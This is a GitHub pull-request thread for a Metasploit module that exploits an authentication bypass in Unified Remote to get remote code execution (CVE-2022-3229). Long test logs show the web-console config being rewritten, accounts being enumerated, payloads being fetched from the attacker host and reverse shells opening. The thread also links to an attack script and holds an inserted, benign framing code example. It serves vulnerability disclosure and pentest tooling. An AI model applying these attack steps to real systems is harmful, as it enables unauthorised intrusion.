
unified_remote exploit #16989

Merged: merged 7 commits into from Sep 21, 2022

Conversation

h00die (Contributor) commented Sep 7, 2022

A similar exploit to #16985

This PR adds a new module to exploit an auth bypass to RCE in 'Unified Remote'.
Leaving it as a draft right now while talking to @todb / @todb-r7 about a possible CVE for it. It also needs a real description and docs, but I wanted to post it to gather info on the CVE stuff.

@H4rk3nz0 looks like you were the original author (and your Twitter is gone). Did you ever reach out to the company to responsibly disclose? If so, can you post details so we can possibly get this CVEd as well? It's still valid against the most recent version.

This is a neat exploit: you connect to the web server (no auth) to pull the config, then set the RDP-ish auth to none if needed. Then you connect to the service and ask it to open cmd, then type out what you want on the user's screen. It's fun to watch shellcode :). I wrote a cmdstager method, but due to the buffering and timeouts I decided to remove it, as it just wasn't a good fit at all unfortunately. I used @H4rk3nz0's original method, which uses the host to serve the payload on a web server and just downloads it. MUCH faster and more reliable.

Verification

  • Install and start the software. I tried it on the one linked in EDB and the most recent one on the website.
  • Start msfconsole
  • use exploit/windows/misc/unified_remote
  • Set rhost and lhost as required.
  • run
  • Verify it works with an auth method other than none, and with none.
  • Documentation looks good

github-actions bot commented Sep 7, 2022

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

h00die (Contributor, Author) commented Sep 7, 2022

@H4rk3nz0 wanted to show you https://github.com/rapid7/metasploit-framework/pull/16989/files#diff-36de1eb4db0be8601b9f08557b8add6cf522a8b14f93bf59aee7eb83ca1dc547R133 . In your original POC you had da, d8, dc, but all those callouts for 'space' and such weren't needed, as it was just changing the body-length variable.
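The point h00die makes above is that the separate hex blobs in the original PoC differed only in a body-length field, so the field should be computed from the body rather than patched by hand for each string. The following is an added example written for this page; it is not code from the module, from either PoC, or from Unified Intents. The 4-byte big-endian length prefix is an illustrative assumption and is not Unified Remote's actual wire format. It builds frames from arbitrary bodies, shows which byte offsets change between two commands of different length, and reassembles frames from a TCP stream that may arrive in partial chunks.

```ruby
# Added example, not from the Unified Remote module or either PoC.
# Generic length-prefixed framing: the length field is computed from the
# body instead of being hand-edited per message. The 4-byte big-endian
# prefix is an ASSUMPTION for illustration, not Unified Remote's format.
module LengthPrefixed
  HEADER_SIZE = 4
  MAX_BODY    = 1 << 20 # refuse absurd lengths before allocating

  # Build one frame: [uint32 big-endian byte length][body bytes].
  def self.build(body)
    body = body.b # count bytes, not characters, so UTF-8 bodies frame correctly
    raise ArgumentError, 'body too large' if body.bytesize > MAX_BODY
    [body.bytesize].pack('N') + body
  end

  # Streaming decoder: feed it whatever the socket returns, in any chunk
  # size, and collect complete bodies as they become available.
  class Decoder
    def initialize
      @buf = ''.b
    end

    # Returns an Array of complete bodies parsed from the data seen so far.
    def feed(chunk)
      @buf << chunk.b
      out = []
      loop do
        break if @buf.bytesize < HEADER_SIZE
        len = @buf.byteslice(0, HEADER_SIZE).unpack1('N')
        raise 'declared length exceeds MAX_BODY' if len > MAX_BODY
        break if @buf.bytesize < HEADER_SIZE + len # wait for the rest
        out << @buf.byteslice(HEADER_SIZE, len)
        @buf = @buf.byteslice(HEADER_SIZE + len..-1)
      end
      out
    end

    # Bytes buffered but not yet forming a complete frame.
    def pending
      @buf.bytesize
    end
  end

  # Byte offsets at which two frames differ. For two commands of different
  # length this includes the header, the field the original PoC patched by hand.
  def self.diff_offsets(a, b)
    (0...[a.bytesize, b.bytesize].max).select { |i| a.getbyte(i) != b.getbyte(i) }
  end
end

if $PROGRAM_NAME == __FILE__
  f1 = LengthPrefixed.build('whoami')       # constructed sample command
  f2 = LengthPrefixed.build('whoami /all')  # constructed sample command
  puts "frame1: #{f1.unpack1('H*')}"
  puts "frame2: #{f2.unpack1('H*')}"
  puts "differing offsets: #{LengthPrefixed.diff_offsets(f1, f2).inspect}"

  dec = LengthPrefixed::Decoder.new
  # Simulate the kernel handing the stream over in 5-byte pieces.
  bodies = (f1 + f2).bytes.each_slice(5).flat_map { |s| dec.feed(s.pack('C*')) }
  puts "reassembled: #{bodies.inspect}, pending bytes: #{dec.pending}"
end
```

Run it directly with `ruby` to see the two frames side by side; only offset 3 (the low byte of the length) and the extra body bytes differ, which is why one builder replaces a family of hand-made hex strings.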

H4rk3nz0 commented Sep 7, 2022

@h00die thanks for the cool module writeup; I never did get far with dissecting what everything in the hex body was doing :). I do recall reaching out to Unified Remote through their on-site contact at the time of testing Unified Remote (~mid-February 2021). I am having trouble finding the exact date of that correspondence, as it was just a response from them stating that they don't consider it a problem as users are able to set authentication passwords for the web console, which was disabled by default. I didn't chase for a CVE at the time. Will let you know if I can locate an exact date, but it may be lost to the digital ether.

h00die (Contributor, Author) commented Sep 8, 2022

@H4rk3nz0 interesting. I see how you can disable the web console (it's enabled by default), but not how to 'secure' it. I see you can set creds for the remote portion, but we can bypass that if the web console is enabled. Seems like things aren't adding up, but I guess we can move forward without a CVE. I'm adding in some checks now for the site being down, and then will push this up for review.

@h00die h00die marked this pull request as ready for review September 8, 2022 21:09
h00die (Contributor, Author) commented Sep 8, 2022

@H4rk3nz0 if you have time, give this module a try and let me know how it's working for you.

cdelafuente-r7 (Contributor) left a review comment

Thanks @h00die for this module! I just left a few minor comments for you to review when you get a chance.

Review threads on modules/exploits/windows/misc/unified_remote_rce.rb (outdated, resolved)
h00die (Contributor, Author) commented Sep 14, 2022

@H4rk3nz0 can you please confirm there is a way to auth the web page controller? I don't see that option anywhere, just 'turn it off and on'.

H4rk3nz0 commented

Hi @h00die I believe I misunderstood the functionality of the password feature at the time. I am unable to secure web console outside of completely disabling it.

Also, I thought this may interest you as a potential improvement to the current script that can remove the possibility of user interaction interrupting the payload process:

https://pastebin.com/raw/VMeWckHA

I have attached a modified script (rough and quick edit, apologies), as Unified Remote has a 'premium feature' for the mobile app that allows executing commands remotely as a 'utility function'. Naturally it's not too hard to figure out what is controlling the length of the string set as the command payload. It all happens out of view of the GUI. Let me know what you think, cheers.

H4rk3nz0 commented

Quick extra note: any command output is returned in the TCP response from the Unified Remote server as a `Result:`, if that is of interest.

h00die (Contributor, Author) commented Sep 15, 2022

Pushing back to draft while looking at the improvements.

@h00die h00die marked this pull request as draft September 15, 2022 19:15
todb-r7 commented Sep 15, 2022

Hi @h00die and @H4rk3nz0

So for a CVE, let's gather this in one place, so I can release @smcintyre-r7 and/or @mkienow-r7 to actually do the CVE assignment.

Here's the CVE distillation:

Title: Unified Intents AB Unified Remote Improper Authorization
Vulnerable Software/Component name: Unified Remote
Vendor/Project name: Unified Intents AB
Vulnerable Version Number: 3.11.0.2483 (50)
CWE: CWE-285 Improper Authorization
Short Description: Because the web management interface for Unified Intents' Unified Remote solution does not itself require authentication, a remote, unauthenticated attacker can change or disable authentication requirements for the Unified Remote protocol, and leverage this now-unauthenticated access to run code of the attacker's choosing.

mkienow-r7 (Contributor) commented

Reserved CVE ID CVE-2022-3229.

@h00die h00die marked this pull request as ready for review September 18, 2022 23:04
h00die (Contributor, Author) commented Sep 18, 2022

@H4rk3nz0 implemented the new hidden script mode. Works great. Added docs and CVE.

PS @H4rk3nz0 congrats on getting 2 CVEs and hopefully soon 2 modules in Metasploit! It may be almost a year after discovery, but better late than never!

h00die (Contributor, Author) commented Sep 19, 2022

@H4rk3nz0 was the name 'update' something you set in the script name? Seemed like it, but I forgot to test making that a variable before updating the PR.

H4rk3nz0 commented

@h00die, thanks for the hard work transcribing the scripts to msf modules. Your hard work is much appreciated. With regard to 'update', I assume you're referring to within the hex and the call for the 'invisible' feature? As I understand it, the invisible command execution feature creates a batch file on Windows and a bash file on Linux hosts, which it makes calls to 'update' the content of, then executes it in a following call and returns the output. https://www.unifiedremote.com/remotes/command

As I understand it, despite being a 'pro' feature, the invisible option should work by default on all Unified Remote installations. Also a quick note: I see you included the pastebin URL I shared as a reference, but please be aware that the pastebin will expire in 9 days' time from now. I didn't expect that you would include it, my apologies. If you would like to modify that and create a more permanent store, then by all means.

h00die (Contributor, Author) commented Sep 19, 2022

After testing, the word 'update' is not changeable; it's part of the protocol.

@H4rk3nz0 I'll leave the ref in there for the time being in case there are any other changes during testing.

cdelafuente-r7 (Contributor) left a review comment

Thanks @h00die for your updates. I just left a few minor comments before it lands. I tested with all the different configurations you described in the documentation and it works great.

Review threads on modules/exploits/windows/misc/unified_remote_rce.rb (outdated, resolved)
h00die (Contributor, Author) commented Sep 20, 2022

Should be good to go!

cdelafuente-r7 (Contributor) commented

Thanks @h00die for updating this. Everything looks good to me now. I tested multiple scenarios against Unified Remote version 3.11.0.2483(50) on Windows 11 and verified it works as expected. I'll go ahead and land it.

Example output

Tested against Unified Remote version 3.11.0.2483(50) on Windows 11

No authentication - visible true
msf6 exploit(windows/misc/unified_remote_rce) > exploit lhost=10.0.0.1 rhosts=10.0.0.81 verbose=true visible=true

[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.81:9512 - Client name set to: android-95DshytVePd24tlG
[*] 10.0.0.81:9512 - Retrieving server config
[+] 10.0.0.81:9512 - No security enabled
[+] 10.0.0.81:9512 - Found account: admin
[+] 10.0.0.81:9512 - Found account: msfuser
[*] 10.0.0.81:9512 - Sending handshake
[*] 10.0.0.81:9512 - Sending empty authentication
[*] 10.0.0.81:9512 - Using URL: http://10.0.0.1:8080/
[*] 10.0.0.81:9512 - Opening Start Menu
[*] 10.0.0.81:9512 - Opening command prompt
[*] 10.0.0.81:9512 - Typing out payload
[*] 10.0.0.81:9512 - Attempting to open payload
[+] 10.0.0.81:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 10.0.0.81:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.0.0.81
[*] Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.81:49995) at 2022-09-21 13:49:22 +0200
[*] 10.0.0.81:9512 - Server stopped.
[!] 10.0.0.81:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\L3jbM5pW.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.22000.856]
-----


C:\Users\n00tmeg>whoami
whoami
desktop-26cqrhp\n00tmeg

C:\Users\n00tmeg>ver
ver

Microsoft Windows [Version 10.0.22000.856]

C:\Users\n00tmeg>exit
exit

[*] 10.0.0.81 - Command shell session 1 closed.  Reason: User exit
msf6 exploit(windows/misc/unified_remote_rce) > creds
Credentials
===========

host       origin     service                public   private  realm  private_type    JtR Format
----       ------     -------                ------   -------  -----  ------------    ----------
10.0.0.81  10.0.0.81  9512/tcp (wifi mouse)  admin                    Blank password
10.0.0.81  10.0.0.81  9512/tcp (wifi mouse)  msfuser                  Blank password

No authentication - visible false
msf6 exploit(windows/misc/unified_remote_rce) > exploit lhost=10.0.0.1 rhosts=10.0.0.81 verbose=true visible=false

[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.81:9512 - Client name set to: android-tDfVeyZv8mxrOlWz
[*] 10.0.0.81:9512 - Retrieving server config
[+] 10.0.0.81:9512 - No security enabled
[+] 10.0.0.81:9512 - Found account: admin
[+] 10.0.0.81:9512 - Found account: msfuser
[*] 10.0.0.81:9512 - Sending handshake
[*] 10.0.0.81:9512 - Sending empty authentication
[*] 10.0.0.81:9512 - Using URL: http://10.0.0.1:8080/
[*] 10.0.0.81:9512 - Loading Unified.Command
[*] 10.0.0.81:9512 - Updating Unified.Command
[*] 10.0.0.81:9512 - Sending payload
[*] 10.0.0.81:9512 - Executing script
[+] 10.0.0.81:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 10.0.0.81:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.0.0.81
[*] Command shell session 2 opened (10.0.0.1:4444 -> 10.0.0.81:50906) at 2022-09-21 13:53:46 +0200
[*] 10.0.0.81:9512 - Server stopped.
[!] 10.0.0.81:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\0ZCveCmHMEWfJ.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.22000.856]
-----


C:\ProgramData\Unified Remote\Remotes\Bundled\Unified\Main\Command>ver
ver

Microsoft Windows [Version 10.0.22000.856]

C:\ProgramData\Unified Remote\Remotes\Bundled\Unified\Main\Command>exit
exit

Group authentication - visible true
msf6 exploit(windows/misc/unified_remote_rce) > exploit lhost=10.0.0.1 rhosts=10.0.0.81 verbose=true visible=true

[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.81:9512 - Client name set to: android-j3bhA09vMPvXb8vQ
[*] 10.0.0.81:9512 - Retrieving server config
[*] 10.0.0.81:9512 - anonymous mode enabled, password required, bypassing
[*] 10.0.0.81:9512 - Uploading new server config
[*] 10.0.0.81:9512 - Sleeping 5 seconds for server to restart
[+] 10.0.0.81:9512 - Found account: admin
[+] 10.0.0.81:9512 - Found account: msfuser
[*] 10.0.0.81:9512 - Sending handshake
[*] 10.0.0.81:9512 - Sending empty authentication
[*] 10.0.0.81:9512 - Using URL: http://10.0.0.1:8080/
[*] 10.0.0.81:9512 - Opening Start Menu
[*] 10.0.0.81:9512 - Opening command prompt
[*] 10.0.0.81:9512 - Typing out payload
[*] 10.0.0.81:9512 - Attempting to open payload
[+] 10.0.0.81:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 10.0.0.81:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] 10.0.0.81:9512 - Reverting security mode
[*] 10.0.0.81:9512 - Uploading new server config
[*] 10.0.0.81:9512 - Sleeping 5 seconds for server to restart
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.0.0.81
[*] Command shell session 3 opened (10.0.0.1:4444 -> 10.0.0.81:51241) at 2022-09-21 13:55:20 +0200
[*] 10.0.0.81:9512 - Server stopped.
[!] 10.0.0.81:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\cz4TFFcXcjRky6KM6.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.22000.856]
-----


C:\Users\n00tmeg>ver
ver

Microsoft Windows [Version 10.0.22000.856]

C:\Users\n00tmeg>exit
exit

Group authentication - visible false
msf6 exploit(windows/misc/unified_remote_rce) > exploit lhost=10.0.0.1 rhosts=10.0.0.81 verbose=true visible=false

[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.81:9512 - Client name set to: android-c39NkUzx13S9npUY
[*] 10.0.0.81:9512 - Retrieving server config
[*] 10.0.0.81:9512 - anonymous mode enabled, password required, bypassing
[*] 10.0.0.81:9512 - Uploading new server config
[*] 10.0.0.81:9512 - Sleeping 5 seconds for server to restart
[+] 10.0.0.81:9512 - Found account: admin
[+] 10.0.0.81:9512 - Found account: msfuser
[*] 10.0.0.81:9512 - Sending handshake
[*] 10.0.0.81:9512 - Sending empty authentication
[*] 10.0.0.81:9512 - Using URL: http://10.0.0.1:8080/
[*] 10.0.0.81:9512 - Loading Unified.Command
[*] 10.0.0.81:9512 - Updating Unified.Command
[*] 10.0.0.81:9512 - Sending payload
[*] 10.0.0.81:9512 - Executing script
[+] 10.0.0.81:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 10.0.0.81:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.0.0.81
[*] 10.0.0.81:9512 - Reverting security mode
[*] 10.0.0.81:9512 - Uploading new server config
[*] 10.0.0.81:9512 - Sleeping 5 seconds for server to restart
[*] Command shell session 4 opened (10.0.0.1:4444 -> 10.0.0.81:51492) at 2022-09-21 13:56:34 +0200
[*] 10.0.0.81:9512 - Server stopped.
[!] 10.0.0.81:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\dew14t1g0D82F8.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.22000.856]
-----


C:\ProgramData\Unified Remote\Remotes\Bundled\Unified\Main\Command>ver
ver

Microsoft Windows [Version 10.0.22000.856]

C:\ProgramData\Unified Remote\Remotes\Bundled\Unified\Main\Command>exit
exit

User authentication - visible true
msf6 exploit(windows/misc/unified_remote_rce) > exploit lhost=10.0.0.1 rhosts=10.0.0.81 verbose=true visible=true

[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.81:9512 - Client name set to: android-ZKbbUwQMtpWfQ0Sp
[*] 10.0.0.81:9512 - Retrieving server config
[*] 10.0.0.81:9512 - users mode enabled, password required, bypassing
[*] 10.0.0.81:9512 - Uploading new server config
[*] 10.0.0.81:9512 - Sleeping 5 seconds for server to restart
[+] 10.0.0.81:9512 - Found account: admin
[+] 10.0.0.81:9512 - Found account: msfuser
[*] 10.0.0.81:9512 - Sending handshake
[*] 10.0.0.81:9512 - Sending empty authentication
[*] 10.0.0.81:9512 - Using URL: http://10.0.0.1:8080/
[*] 10.0.0.81:9512 - Opening Start Menu
[*] 10.0.0.81:9512 - Opening command prompt
[*] 10.0.0.81:9512 - Typing out payload
[*] 10.0.0.81:9512 - Attempting to open payload
[+] 10.0.0.81:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 10.0.0.81:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] 10.0.0.81:9512 - Reverting security mode
[*] 10.0.0.81:9512 - Uploading new server config
[*] 10.0.0.81:9512 - Sleeping 5 seconds for server to restart
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.0.0.81
[*] Command shell session 5 opened (10.0.0.1:4444 -> 10.0.0.81:51750) at 2022-09-21 13:57:55 +0200
[*] 10.0.0.81:9512 - Server stopped.
[!] 10.0.0.81:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\htrpsCR8Ye5VLd.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.22000.856]
-----


C:\Users\n00tmeg>ver
ver

Microsoft Windows [Version 10.0.22000.856]

C:\Users\n00tmeg>exit
exit

User authentication - visible false
msf6 exploit(windows/misc/unified_remote_rce) > exploit lhost=10.0.0.1 rhosts=10.0.0.81 verbose=true visible=false

[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.81:9512 - Client name set to: android-B1xhVXeS4GuKVTI9
[*] 10.0.0.81:9512 - Retrieving server config
[*] 10.0.0.81:9512 - users mode enabled, password required, bypassing
[*] 10.0.0.81:9512 - Uploading new server config
[*] 10.0.0.81:9512 - Sleeping 5 seconds for server to restart
[+] 10.0.0.81:9512 - Found account: admin
[+] 10.0.0.81:9512 - Found account: msfuser
[*] 10.0.0.81:9512 - Sending handshake
[*] 10.0.0.81:9512 - Sending empty authentication
[*] 10.0.0.81:9512 - Using URL: http://10.0.0.1:8080/
[*] 10.0.0.81:9512 - Loading Unified.Command
[*] 10.0.0.81:9512 - Updating Unified.Command
[*] 10.0.0.81:9512 - Sending payload
[*] 10.0.0.81:9512 - Executing script
[+] 10.0.0.81:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 10.0.0.81:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.0.0.81
[*] 10.0.0.81:9512 - Reverting security mode
[*] 10.0.0.81:9512 - Uploading new server config
[*] 10.0.0.81:9512 - Sleeping 5 seconds for server to restart
[*] Command shell session 6 opened (10.0.0.1:4444 -> 10.0.0.81:52012) at 2022-09-21 13:59:09 +0200
[*] 10.0.0.81:9512 - Server stopped.
[!] 10.0.0.81:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\GHddShH1Ppzs8EZ8.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.22000.856]
-----


C:\ProgramData\Unified Remote\Remotes\Bundled\Unified\Main\Command>ver
ver

Microsoft Windows [Version 10.0.22000.856]

C:\ProgramData\Unified Remote\Remotes\Bundled\Unified\Main\Command>exit
exit

No authentication - no web server access - visible true
msf6 exploit(windows/misc/unified_remote_rce) > exploit lhost=10.0.0.1 rhosts=10.0.0.81 verbose=true visible=true

[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.81:9512 - Client name set to: android-ogRbsUFX62J8iFdA
[*] 10.0.0.81:9512 - Retrieving server config
[-] 10.0.0.81:9512 - Web interface is disabled. Unable to attempt bypass, assuming no authentication.
[*] 10.0.0.81:9512 - Sending handshake
[*] 10.0.0.81:9512 - Sending empty authentication
[*] 10.0.0.81:9512 - Using URL: http://10.0.0.1:8080/
[*] 10.0.0.81:9512 - Opening Start Menu
[*] 10.0.0.81:9512 - Opening command prompt
[*] 10.0.0.81:9512 - Typing out payload
[*] 10.0.0.81:9512 - Attempting to open payload
[+] 10.0.0.81:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 10.0.0.81:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.0.0.81
[*] Command shell session 7 opened (10.0.0.1:4444 -> 10.0.0.81:52354) at 2022-09-21 14:00:56 +0200
[*] 10.0.0.81:9512 - Server stopped.
[!] 10.0.0.81:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\3gr3nCxvVz.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.22000.856]
-----


C:\Users\n00tmeg>ver
ver

Microsoft Windows [Version 10.0.22000.856]

C:\Users\n00tmeg>exit
exit

User authentication - no web server access - visible true (should fail)
msf6 exploit(windows/misc/unified_remote_rce) > exploit lhost=10.0.0.1 rhosts=10.0.0.81 verbose=true visible=true

[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.81:9512 - Client name set to: android-mFdZeFQQlIEC4tny
[*] 10.0.0.81:9512 - Retrieving server config
[-] 10.0.0.81:9512 - Web interface is disabled. Unable to attempt bypass, assuming no authentication.
[*] 10.0.0.81:9512 - Sending handshake
[*] 10.0.0.81:9512 - Sending empty authentication
[*] 10.0.0.81:9512 - Using URL: http://10.0.0.1:8080/
[*] 10.0.0.81:9512 - Opening Start Menu
[*] 10.0.0.81:9512 - Opening command prompt
[*] 10.0.0.81:9512 - Typing out payload
[*] 10.0.0.81:9512 - Attempting to open payload
[*] 10.0.0.81:9512 - Server stopped.
[!] 10.0.0.81:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\pVjiMsClA2.exe' on the target
[*] Exploit completed, but no session was created.

@cdelafuente-r7 cdelafuente-r7 added the rn-modules release notes for new or majorly enhanced modules label Sep 21, 2022
@cdelafuente-r7 cdelafuente-r7 merged commit 4943d86 into rapid7:master Sep 21, 2022
23 checks passed
cdelafuente-r7 (Contributor) commented

Release Notes

This adds an exploit module to exploit an authentication bypass to achieve remote code execution in Unified Remote on Windows. Note that the latest version (3.11.0.2483) is vulnerable, which makes it a 0-day.

@h00die h00die deleted the unified_remote branch September 21, 2022 19:20
todb-r7 commented Feb 6, 2023

FWIW, just published this CVE. Sorry for the delay.

H4rk3nz0 commented Feb 6, 2023

Not a problem, I just got the Web Triggerable RCE working. In theory any Unified Remote user that visits a web page* with the right JS could get popped.


### PATH

This ONLY applies to the pull method. Where to temporarily store the payload. Defaults to `c:\\Windows\\Temp\\`
Review comment (Contributor):

What alternatives are there to "the pull method"?

pull is not mentioned or documented anywhere else, with the exception of the module target which states "pull".

```ruby
'Platform' => 'win',
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' => [
['pull', {}],
```
Review comment (Contributor):

?

Labels: docs, module, rn-modules (release notes for new or majorly enhanced modules)

6 participants